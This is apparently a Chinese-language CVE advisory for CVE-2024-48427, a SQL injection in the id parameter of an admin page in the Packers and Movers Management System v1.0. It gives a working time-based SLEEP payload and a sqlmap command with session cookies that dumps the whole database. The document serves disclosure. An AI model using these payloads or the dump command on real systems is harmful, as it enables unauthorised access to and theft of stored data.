CVE-2024-48427
描述
Sourcecodester Packers and Movers Management System v1.0 中存在一个 SQL 注入漏洞,允许远程认证用户通过 /mpms/admin/?page=services/manage_service&id 中的 id 参数执行任意 SQL 命令。
漏洞类型
SQL 注入
产品供应商
Sourcecodester
受影响产品代码库:
https://www.sourcecodester.com/php/15360/packers-and-movers-management-system-phpoop-free-source-code.html - 1.0
受影响组件:
位于 /mpms/admin/?page=services/manage_service&id 的更新服务详情页面中的 id 参数
攻击向量:
- 在本地设置应用程序并使用给定的默认凭据登录管理员面板。
- 导航到漏洞页面:http://localhost/mpms/admin/?page=services/manage_service&id=2
- 向 id 参数注入 SQL 载荷:http://localhost/mpms/admin/?page=services/manage_service&id=1' OR SLEEP(5)-- puNr
- 观察应用程序响应:若注入成功,页面加载时间应明显延长(5 秒),确认 id 参数存在 SQL 注入漏洞。
- 现在运行 SQLMap 工具以转储数据库详情:
- sqlmap -u "http://localhost/mpms/admin/?page=services/manage_service&id=1" --cookie="phpMyAdmin=ju34bd3d8q0jdf6td4ntqscaqd;PHPSESSID=eopn8q1p8c1f5m1v5igjoir8k1;" --dbms mysql -p id --risk 3 --level 4 --dbs --dump
参考:
- https://owasp.org/www-community/attacks/SQL_Injection
- https://portswigger.net/web-security/sql-injection